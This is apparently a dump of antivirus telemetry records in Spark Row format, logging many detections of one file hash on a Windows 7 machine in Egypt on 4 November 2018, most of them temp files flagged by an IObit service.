  Row(detection=Row(filename='tmp0023ebc4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ebc4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:06:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295dfb', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295dfb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:12:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cd16', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cd16', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:40:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e779', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e779', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:01:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e770', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e770', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:01:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290b9f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290b9f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:39:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239c24', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239c24', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:47:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ccbe', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ccbe', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:40:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023abc9', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023abc9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:04:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ab34', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ab34', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:04:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ab4c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ab4c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:04:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ab56', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ab56', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:04:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023eed2', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023eed2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:10:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c90a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c90a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:36:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a39a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a39a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:56:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023911f', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023911f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:35:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238bff', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238bff', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:30:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a3d5', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a3d5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:56:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c9b2', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c9b2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:37:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093258-9a8e0c96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-093258-9A8E0C96', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:32:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295e4c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295e4c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:12:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296eb1', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296eb1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:36:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029294a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029294a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:14:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002935b3', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002935b3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:28:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ae86', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ae86', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:08:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296eee', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296eee', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:36:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002935c1', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002935c1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:28:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023d3e3', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d3e3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:48:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237e85', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237e85', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:15:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090923-dd98bf16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-090923-DD98BF16', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:08:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023904e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023904e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:34:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290b03', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290b03', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:38:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238ff1', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238ff1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:34:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238f93', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238f93', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:34:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238f9b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238f9b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:34:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023bf09', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023bf09', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:25:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023984e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023984e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:43:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239886', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239886', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:43:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023deca', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023deca', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:54:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023835c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023835c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023983d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023983d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:43:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ce3b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ce3b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:42:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023be49', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023be49', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:24:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002396b6', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002396b6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:41:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239f1d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239f1d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:51:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023be0d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023be0d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:24:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239614', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239614', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:41:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239585', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239585', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:40:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002395c3', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002395c3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:40:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239554', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239554', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:40:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029209a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029209a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:04:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029212c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029212c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:04:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291b25', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291b25', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:57:58Z'), dt=datetime.date(2018, 11, 4)),
